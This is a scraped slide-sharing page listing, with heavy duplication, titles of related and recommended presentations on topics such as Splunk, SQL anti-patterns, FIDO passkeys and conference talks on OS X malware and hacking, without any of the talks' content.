Splunk Enterpise for Information Security Hands-OnSplunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk
 
ビッグデータ処理データベースの全体像と使い分け
2018年version
ビッグデータ処理データベースの全体像と使い分け
2018年versionビッグデータ処理データベースの全体像と使い分け
2018年version
ビッグデータ処理データベースの全体像と使い分け
2018年versionTetsutaro Watanabe
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
xOps: エンジニアがスタートアップの成長の原動力となる日
xOps: エンジニアがスタートアップの成長の原動力となる日xOps: エンジニアがスタートアップの成長の原動力となる日
xOps: エンジニアがスタートアップの成長の原動力となる日Takaaki Umada
 
SHODAN search Engine
SHODAN search EngineSHODAN search Engine
SHODAN search EngineYash Diwakar
 
立教大学MBA:AIの最先端技術によるこれからの価値創造
立教大学MBA:AIの最先端技術によるこれからの価値創造立教大学MBA:AIの最先端技術によるこれからの価値創造
立教大学MBA:AIの最先端技術によるこれからの価値創造Osaka University
 
Technology stack of social networks [MTS]
Technology stack of social networks [MTS]Technology stack of social networks [MTS]
Technology stack of social networks [MTS]philmaweb
 
Application development with c#, .net 6, blazor web assembly, asp.net web api...
Application development with c#, .net 6, blazor web assembly, asp.net web api...Application development with c#, .net 6, blazor web assembly, asp.net web api...
Application development with c#, .net 6, blazor web assembly, asp.net web api...Shotaro Suzuki
 
2015-10-31 クラウドネイティヴ時代の運用を考える 〜 ドキュメント駆動運用へ
2015-10-31 クラウドネイティヴ時代の運用を考える 〜 ドキュメント駆動運用へ2015-10-31 クラウドネイティヴ時代の運用を考える 〜 ドキュメント駆動運用へ
2015-10-31 クラウドネイティヴ時代の運用を考える 〜 ドキュメント駆動運用へOperation Lab, LLC.
 
Building a Consistent Hybrid Cloud Semantic Model In Denodo
Building a Consistent Hybrid Cloud Semantic Model In DenodoBuilding a Consistent Hybrid Cloud Semantic Model In Denodo
Building a Consistent Hybrid Cloud Semantic Model In DenodoDenodo
 

What's hot (20)

SQLアンチパターン読書会 4章 キーレスエンエントリ(外部キー嫌い)
SQLアンチパターン読書会 4章 キーレスエンエントリ(外部キー嫌い)SQLアンチパターン読書会 4章 キーレスエンエントリ(外部キー嫌い)
SQLアンチパターン読書会 4章 キーレスエンエントリ(外部キー嫌い)
 
SQLアンチパターン~スパゲッティクエリ
SQLアンチパターン~スパゲッティクエリSQLアンチパターン~スパゲッティクエリ
SQLアンチパターン~スパゲッティクエリ
 
Part 0: 製造リファレンス・アーキテクチャとは?(製造リファレンス・アーキテクチャ勉強会)
Part 0: 製造リファレンス・アーキテクチャとは?(製造リファレンス・アーキテクチャ勉強会)Part 0: 製造リファレンス・アーキテクチャとは?(製造リファレンス・アーキテクチャ勉強会)
Part 0: 製造リファレンス・アーキテクチャとは?(製造リファレンス・アーキテクチャ勉強会)
 
ドメイン駆動設計 コアドメインを語り合ってみよう
ドメイン駆動設計 コアドメインを語り合ってみようドメイン駆動設計 コアドメインを語り合ってみよう
ドメイン駆動設計 コアドメインを語り合ってみよう
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
 
Selenideを使って上司のよくある勘違いを回避するお話
Selenideを使って上司のよくある勘違いを回避するお話Selenideを使って上司のよくある勘違いを回避するお話
Selenideを使って上司のよくある勘違いを回避するお話
 
Using Wardley Maps to Understand Security's Landscape and Strategy
Using Wardley Maps to Understand Security's Landscape and StrategyUsing Wardley Maps to Understand Security's Landscape and Strategy
Using Wardley Maps to Understand Security's Landscape and Strategy
 
オントロジー工学に基づくセマンティック技術(1)オントロジー工学入門
オントロジー工学に基づくセマンティック技術(1)オントロジー工学入門オントロジー工学に基づくセマンティック技術(1)オントロジー工学入門
オントロジー工学に基づくセマンティック技術(1)オントロジー工学入門
 
Designing Puppet: Roles/Profiles Pattern
Designing Puppet: Roles/Profiles PatternDesigning Puppet: Roles/Profiles Pattern
Designing Puppet: Roles/Profiles Pattern
 
情報共有から始めるチーム開発とキャリア戦略
情報共有から始めるチーム開発とキャリア戦略情報共有から始めるチーム開発とキャリア戦略
情報共有から始めるチーム開発とキャリア戦略
 
Splunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-OnSplunk Enterpise for Information Security Hands-On
Splunk Enterpise for Information Security Hands-On
 
ビッグデータ処理データベースの全体像と使い分け
2018年version
ビッグデータ処理データベースの全体像と使い分け
2018年versionビッグデータ処理データベースの全体像と使い分け
2018年version
ビッグデータ処理データベースの全体像と使い分け
2018年version
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
xOps: エンジニアがスタートアップの成長の原動力となる日
xOps: エンジニアがスタートアップの成長の原動力となる日xOps: エンジニアがスタートアップの成長の原動力となる日
xOps: エンジニアがスタートアップの成長の原動力となる日
 
SHODAN search Engine
SHODAN search EngineSHODAN search Engine
SHODAN search Engine
 
立教大学MBA:AIの最先端技術によるこれからの価値創造
立教大学MBA:AIの最先端技術によるこれからの価値創造立教大学MBA:AIの最先端技術によるこれからの価値創造
立教大学MBA:AIの最先端技術によるこれからの価値創造
 
Technology stack of social networks [MTS]
Technology stack of social networks [MTS]Technology stack of social networks [MTS]
Technology stack of social networks [MTS]
 
Application development with c#, .net 6, blazor web assembly, asp.net web api...
Application development with c#, .net 6, blazor web assembly, asp.net web api...Application development with c#, .net 6, blazor web assembly, asp.net web api...
Application development with c#, .net 6, blazor web assembly, asp.net web api...
 
2015-10-31 クラウドネイティヴ時代の運用を考える 〜 ドキュメント駆動運用へ
2015-10-31 クラウドネイティヴ時代の運用を考える 〜 ドキュメント駆動運用へ2015-10-31 クラウドネイティヴ時代の運用を考える 〜 ドキュメント駆動運用へ
2015-10-31 クラウドネイティヴ時代の運用を考える 〜 ドキュメント駆動運用へ
 
Building a Consistent Hybrid Cloud Semantic Model In Denodo
Building a Consistent Hybrid Cloud Semantic Model In DenodoBuilding a Consistent Hybrid Cloud Semantic Model In Denodo
Building a Consistent Hybrid Cloud Semantic Model In Denodo
 

Viewers also liked

DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS XSynack
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperSynack
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItSynack
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation PrimitivesSynack
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX MalwareSynack
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!Synack
 
Gatekeeper Exposed
Gatekeeper ExposedGatekeeper Exposed
Gatekeeper ExposedSynack
 
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...Synack
 
Synack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!Synack
 
Zeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningZeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningSynack
 
Lee then-lim cc-fp finals_l 014-251115
Lee then-lim cc-fp finals_l 014-251115Lee then-lim cc-fp finals_l 014-251115
Lee then-lim cc-fp finals_l 014-251115Xiao Yun
 
преимущества и недостатки интернета
преимущества и недостатки интернетапреимущества и недостатки интернета
преимущества и недостатки интернетаAy_sel
 
Networkingtips 130213160947-phpapp02
Networkingtips 130213160947-phpapp02Networkingtips 130213160947-phpapp02
Networkingtips 130213160947-phpapp02Sonu Jena
 
Why National Brands Must Adapt to Changing Traveler Behavior
Why National Brands Must Adapt to Changing Traveler Behavior Why National Brands Must Adapt to Changing Traveler Behavior
Why National Brands Must Adapt to Changing Traveler Behavior Placeable
 

Viewers also liked (20)

DLL Hijacking on OS X
DLL Hijacking on OS XDLL Hijacking on OS X
DLL Hijacking on OS X
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing Gatekeeper
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
 
iOS Automation Primitives
iOS Automation PrimitivesiOS Automation Primitives
iOS Automation Primitives
 
RSA OSX Malware
RSA OSX MalwareRSA OSX Malware
RSA OSX Malware
 
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
DEF CON 23: 'DLL Hijacking' on OS X? #@%& Yeah!
 
Gatekeeper Exposed
Gatekeeper ExposedGatekeeper Exposed
Gatekeeper Exposed
 
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
DEF CON 23: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simplex ...
 
Synack cirtical infrasructure webinar
Synack cirtical infrasructure webinarSynack cirtical infrasructure webinar
Synack cirtical infrasructure webinar
 
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one![DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
[DefCon 2016] I got 99 Problems, but 
Little Snitch ain’t one!
 
Zeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanningZeronights 2016 - Automating iOS blackbox security scanning
Zeronights 2016 - Automating iOS blackbox security scanning
 
Structural insulated panels price
Structural insulated panels priceStructural insulated panels price
Structural insulated panels price
 
Osb eps osb structural insulated panels
Osb eps osb structural insulated panelsOsb eps osb structural insulated panels
Osb eps osb structural insulated panels
 
Lee then-lim cc-fp finals_l 014-251115
Lee then-lim cc-fp finals_l 014-251115Lee then-lim cc-fp finals_l 014-251115
Lee then-lim cc-fp finals_l 014-251115
 
Mgo eps mgo structural insulated panels
Mgo eps mgo structural insulated panelsMgo eps mgo structural insulated panels
Mgo eps mgo structural insulated panels
 
преимущества и недостатки интернета
преимущества и недостатки интернетапреимущества и недостатки интернета
преимущества и недостатки интернета
 
Networkingtips 130213160947-phpapp02
Networkingtips 130213160947-phpapp02Networkingtips 130213160947-phpapp02
Networkingtips 130213160947-phpapp02
 
me
meme
me
 
Why National Brands Must Adapt to Changing Traveler Behavior
Why National Brands Must Adapt to Changing Traveler Behavior Why National Brands Must Adapt to Changing Traveler Behavior
Why National Brands Must Adapt to Changing Traveler Behavior
 
Curriculo atualizado
Curriculo atualizadoCurriculo atualizado
Curriculo atualizado
 

Similar to Black Hat '15: Writing Bad @$$ Malware for OS X

OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorSynack
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...Felipe Prado
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry moreBHack Conference
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-macCyphort
 
Applied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsApplied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsPriyanka Aash
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made SimplePaul Melson
 
NYU Hacknight: iOS and OSX ABI
NYU Hacknight: iOS and OSX ABINYU Hacknight: iOS and OSX ABI
NYU Hacknight: iOS and OSX ABIMikhail Sosonkin
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceIvan Einstein
 
Crisis. advanced malware
Crisis. advanced malwareCrisis. advanced malware
Crisis. advanced malwareYury Chemerkin
 
Malware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharyMalware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharySaurav Chaudhary
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Stefano Maccaglia
 
Synack at AppSec California with Patrick Wardle
Synack at AppSec California with Patrick WardleSynack at AppSec California with Patrick Wardle
Synack at AppSec California with Patrick WardleSynack
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextPriyanka Aash
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextPriyanka Aash
 
Invincea fake british airways ticket spear-phish malware 03-21-2014
Invincea fake british airways ticket spear-phish malware 03-21-2014Invincea fake british airways ticket spear-phish malware 03-21-2014
Invincea fake british airways ticket spear-phish malware 03-21-2014Invincea, Inc.
 
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionFelipe Prado
 

Similar to Black Hat '15: Writing Bad @$$ Malware for OS X (20)

OS X Malware: Let's Play Doctor
OS X Malware: Let's Play DoctorOS X Malware: Let's Play Doctor
OS X Malware: Let's Play Doctor
 
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
DEF CON 27 - workshop ANTHONY ROSE - introduction to amsi bypasses and sandbo...
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Palestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry morePalestra Jeferson Propheta - Wanna Cry more
Palestra Jeferson Propheta - Wanna Cry more
 
Mmw mac malware-mac
Mmw mac malware-macMmw mac malware-mac
Mmw mac malware-mac
 
Applied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documentsApplied machine learning defeating modern malicious documents
Applied machine learning defeating modern malicious documents
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
NYU Hacknight: iOS and OSX ABI
NYU Hacknight: iOS and OSX ABINYU Hacknight: iOS and OSX ABI
NYU Hacknight: iOS and OSX ABI
 
Synack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware PersistenceSynack Shakacon OSX Malware Persistence
Synack Shakacon OSX Malware Persistence
 
Crisis. advanced malware
Crisis. advanced malwareCrisis. advanced malware
Crisis. advanced malware
 
Malware 101 by saurabh chaudhary
Malware 101 by saurabh chaudharyMalware 101 by saurabh chaudhary
Malware 101 by saurabh chaudhary
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...
 
Understand study
Understand studyUnderstand study
Understand study
 
Synack at AppSec California with Patrick Wardle
Synack at AppSec California with Patrick WardleSynack at AppSec California with Patrick Wardle
Synack at AppSec California with Patrick Wardle
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
 
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming NextThe Seven Most Dangerous New Attack Techniques, and What's Coming Next
The Seven Most Dangerous New Attack Techniques, and What's Coming Next
 
Invincea fake british airways ticket spear-phish malware 03-21-2014
Invincea fake british airways ticket spear-phish malware 03-21-2014Invincea fake british airways ticket spear-phish malware 03-21-2014
Invincea fake british airways ticket spear-phish malware 03-21-2014
 
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destructionDEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
DEF CON 27 - PATRICK WARDLE - harnessing weapons of Mac destruction
 

More from Synack

DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesSynack
 
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...Synack
 
Electromagnetic Hypersensitivity and You
Electromagnetic Hypersensitivity and YouElectromagnetic Hypersensitivity and You
Electromagnetic Hypersensitivity and YouSynack
 
Home Automation Benchmarking Report
Home Automation Benchmarking ReportHome Automation Benchmarking Report
Home Automation Benchmarking ReportSynack
 
Let's Hack a House
Let's Hack a HouseLet's Hack a House
Let's Hack a HouseSynack
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack
 
Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack
 

More from Synack (7)

DEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 DevicesDEF CON 23: Internet of Things: Hacking 14 Devices
DEF CON 23: Internet of Things: Hacking 14 Devices
 
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...
Black Hat '15: Spread Spectrum Satcom Hacking: Attacking The GlobalStar Simpl...
 
Electromagnetic Hypersensitivity and You
Electromagnetic Hypersensitivity and YouElectromagnetic Hypersensitivity and You
Electromagnetic Hypersensitivity and You
 
Home Automation Benchmarking Report
Home Automation Benchmarking ReportHome Automation Benchmarking Report
Home Automation Benchmarking Report
 
Let's Hack a House
Let's Hack a HouseLet's Hack a House
Let's Hack a House
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation Vulnerabilities
 
Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack at ShmooCon 2015
Synack at ShmooCon 2015
 

Recently uploaded

So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...itnewsafrica
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterMydbops
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesBernd Ruecker
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Nikki Chapple
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 

Recently uploaded (20)

So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
 
Scale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL RouterScale your database traffic with Read & Write split using MySQL Router
Scale your database traffic with Read & Write split using MySQL Router
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and Insights
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
